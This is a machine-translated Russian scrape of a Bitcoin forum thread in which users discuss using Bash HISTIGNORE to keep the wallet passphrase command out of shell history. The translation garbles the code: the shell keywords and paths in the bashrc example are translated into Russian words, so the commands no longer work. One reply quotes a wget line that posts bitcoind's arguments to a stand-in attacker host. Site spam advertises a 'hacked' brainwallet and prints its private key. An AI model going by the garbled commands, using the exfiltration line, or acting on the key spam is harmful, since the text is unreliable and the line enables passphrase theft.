Вернуться   Биткоин Форум > Разработка и Техническое Обсуждение
15 декабря 2011, 7:59:58 AM   # 1
 
 
Сообщения: 2366
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Взлом Биткоин адресов.
500 Биткоинов взломаны в "мозговом кошельке" с паролем "bitcoin is awesome"
Адрес кошелька: 14NWDXkQwcGN1Pd9fboL8npVynD5SfyJAE
Приватный ключ: 5J64pq77XjeacCezwmAr2V1s7snvvJkuAz8sENxw7xCkikceV6e
подробнее...


Всем кто хочет заработать Биткоины без вложений - рекомендую сайт http://bitcoin-zarabotat.ru
Таким образом, вы используете, что эффектный бумажник шифрования вещи, чтобы держать интернет-кошелек заперта, когда вы не собираетесь отправить что-нибудь ... но проблема: Вы пользователь CLI и вы в конечном итоге с walletpassphrase в вашей оболочке история.

Не волнуйтесь: Bash покрывали Вас (это также возможно в некоторых других оболочках, но вы по своему усмотрению там).

Просто установите HISTIGNORE = «* walletpassphrase *» и история оболочки не будет помнить ни одной строчки с струнной walletpassphrase в нем.
Этот список разделенных двоеточиями, если вы хотите добавить больше моделей.

Заметка: walletpassphrase выше буквально Струна "walletpassphrase", Делать не заменить действительную фразу там! (Благодаря комментариям ниже для указывая эту потенциальную путаницу.

Например, мой ~ / .bashrc может выглядеть следующим образом:
Код:
$ Кошка ~ / .bashrc
# .bashrc

# Источник определение глобального
если [-f / и т.д. / Bashrc]; тогда
. / И т.д. / Bashrc
фи

# конкретных пользователей псевдонимы и функции

HISTSIZE = 50000
HISTCONTROL = ignoreboth
shopt -s histappend
HISTIGNORE = '* walletpassphrase *

HISTCONTROL = ignoreboth делает историю игнорировать повторяющиеся команды и команды, которые имеют префикс с пробелами, так что вы можете держать другой хлам из вашей истории на лета, и HISTSIZE = 50000 значительно расширяет максимальную историю, histappend делает его добавить к вместо перезаписывания хранить историю, позволяя истории вернуться долгий путь. Ни один из них не требуются для Thie HISTIGNORE, но вы можете найти их полезными тоже.

После ввода его в Bashrc, перезагрузить вашу оболочку.

Вы можете мгновенно сказать, если его работы, например,
Код:
$ Ls FOOF
лс не может получить доступ к FOOF: Нет такого файла или каталога
--now нажать up--
$ Ls FOOF
лс не может получить доступ к FOOF: Нет такого файла или каталога
$ Ls walletpassphrase
лс не может получить доступ к walletpassphrase: Нет такого файла или каталога
--now нажать up--
$ Ls FOOF

Конечно, лучшие практики безопасности будут не держать бумажники, которые имеют значение в Интернете, но с небольшим количеством заботы вы можете повысить безопасность вас за то, что вы держите в Интернете.

Ура,
gmaxwell сейчас офлайн Пожаловаться на gmaxwell   Ответить с цитированием Мультицитирование сообщения от gmaxwell Быстрый ответ на сообщение gmaxwell


Как заработать Биткоины?
Без вложений. Не майнинг.


16 декабря 2011, 9:07:02 AM   # 2
 
 
Сообщения: 1050
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Получил 1806 Биткоинов
Реальная история.





Интересно, никогда не знал об этой переменной!
Pieter Wuille сейчас офлайн Пожаловаться на Pieter Wuille   Ответить с цитированием Мультицитирование сообщения от Pieter Wuille Быстрый ответ на сообщение Pieter Wuille

17 декабря 2011, 3:52:56 AM   # 3
 
 
Сообщения: 122
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Затем злоумышленник смотрит в ~ / .bashrc и voilaґ ваш кошелек пароль на серебряной пластине.

Лучше всего здесь было бы создать учетную запись в операционной системе, где все истории Баша и Баш журналы выключены, и использовать эту учетную запись для bitcoining.
Еще лучше, если использовать отдельный LiveCD расст оптимизированную для bitcoining, то история Баш нечего бояться, просто выключить компьютер, когда сделано, и вы уверены, что ничего не остается вашей сессии.
Себастиан сейчас офлайн Пожаловаться на Себастьяне   Ответить с цитированием Мультицитирование сообщения от Себастиан Быстрый ответ на сообщение Себастиан

17 декабря 2011, 8:08:49 AM   # 4
 
 
Сообщения: 289
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Затем злоумышленник смотрит в ~ / .bashrc и voilaґ ваш кошелек пароль на серебряной пластине.

Нет, я думаю, вы поняли. Вы должны буквально установить HISTIGNORE = «* walletpassphrase *» - не заменить «walletpassphrase» с фактической ключевой фразой. Так как вам нужно ввести слово «walletpassphrase» в командной строке при подаче ключевой фразы в Bitcoin, баш не будет писать эту конкретную команду в историю. Я думаю, что пример gmaxwell делает это довольно ясно. Спасибо за полезный совет, gmaxwell!
bitfoo сейчас офлайн Пожаловаться на bitfoo   Ответить с цитированием Мультицитирование сообщения от bitfoo Быстрый ответ на сообщение bitfoo

17 декабря 2011, 10:15:32 AM   # 5
 
 
Сообщения: 1862
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Другой стандартный подход для приложения Linux будет использовать "GetPass" функция, если была предоставлена ​​возможность пароля (i.e.g walletpassphrase), но без какого-либо значения (хотя это потребует изменения источника).

Грубая идея заключается в следующем:

если (has_option ( "walletpassphrase" ) && option_string ( "walletpassphrase" ) .empty ())
   пароль = GetPass ( "Введите пароль: " );

Если кодируются таким образом, то пароль никогда не будет появляться в истории или даже нужно увидеть визуально на экране терминала (вы должны свернуть свою собственную функцию, используя _getch, чтобы достичь того же в Windoze).


Ура,

Ян Knowles.
CIYAM сейчас офлайн Пожаловаться на CIYAM   Ответить с цитированием Мультицитирование сообщения от CIYAM Быстрый ответ на сообщение CIYAM

17 декабря 2011, 9:55:55 PM   # 6
 
 
Сообщения: 637
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Затем злоумышленник смотрит в ~ / .bashrc и voilaґ ваш кошелек пароль на серебряной пластине.

Я надеюсь, что никто не читал его, как Себастьян сделал и поставить там реальный пароль в .bashrc!

Это хорошая идея, чтобы защитить себя от плохого человека, которые используют ваш компьютер и украдкой на ваших вещах. Но если хакер имеет доступ к вашему компьютеру в течение более 30 секунд, он может просто изменить файл / USR / бен / bitcoind, добавив строку, чтобы отправить себе все, что вы делаете с bitcoind. Что-то вроде этого :

Wget -q --post-данные = $ @ malicioussiteupload.org




Dunand сейчас офлайн Пожаловаться на Dunand   Ответить с цитированием Мультицитирование сообщения от Dunand Быстрый ответ на сообщение Dunand

17 декабря 2011, 10:44:02 PM   # 7
 
 
Сообщения: 308
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Но если хакер имеет доступ к вашему компьютеру в течение более 30 секунд, он может просто изменить файл / USR / бен / bitcoind, добавив строку, чтобы отправить себе все, что вы делаете с bitcoind.
Ему нужно будет административный (корень) право изменять что-либо в каталоге / USR / бен.
mcorlett сейчас офлайн Пожаловаться на mcorlett   Ответить с цитированием Мультицитирование сообщения от mcorlett Быстрый ответ на сообщение mcorlett

17 декабря 2011, 11:07:29 PM   # 8
 
 
Сообщения: 637
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Но если хакер имеет доступ к вашему компьютеру в течение более 30 секунд, он может просто изменить файл / USR / бен / bitcoind, добавив строку, чтобы отправить себе все, что вы делаете с bitcoind.
Ему нужно будет административный (корень) право изменять что-либо в каталоге / USR / бен.

Действительно это было слишком просто, чтобы работать. Но плохой парень может изменить путь и создать новый bitcoind где-то загрузить пароль и после того, как вызвать реальную bitcoind.

Моя точка зрения была не оставлять аппарат без защиты.
Dunand сейчас офлайн Пожаловаться на Dunand   Ответить с цитированием Мультицитирование сообщения от Dunand Быстрый ответ на сообщение Dunand

18 декабря 2011, 4:22:24 AM   # 9
 
 
Сообщения: 122
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Теперь я понимаю. Я учил ты имел в виду, что вы должны заменить "walletpassphrase" с фактическим бумажником ключевой фразой.
Так, когда люди пишут таким образом, предполагается, что его следует заменить.

Подобно:
"Для входа в бинарной программы типа двоичной -u = корень р = rootpassword" а затем его предположил, что вы должны заменить rootpassword с фактическим корневой пароль.

Это стоило бы отметить его в начале потока, что вы не должны заменить walletpassphrase с фактической ключевой фразой, так что люди не понимают его. Они могут подумать, Bashrc защищена каким-то образом тогда.
Себастиан сейчас офлайн Пожаловаться на Себастьяне   Ответить с цитированием Мультицитирование сообщения от Себастиан Быстрый ответ на сообщение Себастиан

21 декабря 2011, 7:21:54 AM   # 10
 
 
Сообщения: 2366
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Теперь я понимаю. Я учил ты имел в виду, что вы должны заменить "walletpassphrase" с фактическим бумажником ключевой фразой.
Так, когда люди пишут таким образом, предполагается, что его следует заменить.

Хорошая точка зрения. Это вполне разумная ошибка, особенно если вы не частый encryptedwallet пользователя CLI уже. Я добавил к сведению, надеюсь, это более ясно.

Имея интерфейс Аскер в bitcoind, очевидно, будет nice-, но исключение оболочка довольно хороший общий механизм, особенно с начальным пространством игнорируя, что это хороший инструмент, чтобы иметь в вашей панели инструментов независимо от того, что происходит в Bitcoin.
 

gmaxwell сейчас офлайн Пожаловаться на gmaxwell   Ответить с цитированием Мультицитирование сообщения от gmaxwell Быстрый ответ на сообщение gmaxwell

21 декабря 2011, 9:08:17 PM   # 11
 
 
Сообщения: 1652
Цитировать по имени
цитировать ответ
по умолчанию Re: С помощью CLI ж / шифрования? Защитите вашу ключевую фразу с HISTIGNORE в Bash

Имея интерфейс Аскер в bitcoind, очевидно, будет хорошо ...
Использование:
 вно / wallettools / walletunlock.py
а также
 вно / wallettools / walletchangepass.py

Гэвин Андресен сейчас офлайн Пожаловаться на Гэвин Андресен   Ответить с цитированием Мультицитирование сообщения от Gavin Andresen Быстрый ответ на сообщение Гэвин Андресен



Как заработать Биткоины?

Bitcoin Wallet * Portefeuille Bitcoin * Monedero Bitcoin * Carteira Bitcoin * Portafoglio Bitcoin * Bitcoin Cüzdan * 比特币钱包

bitcoin-zarabotat.ru
Почта для связи: bitcoin-zarabotat.ru@yandex.ru

3HmAQ9FkRFk6HZGuwExYxL62y7C1B9MwPW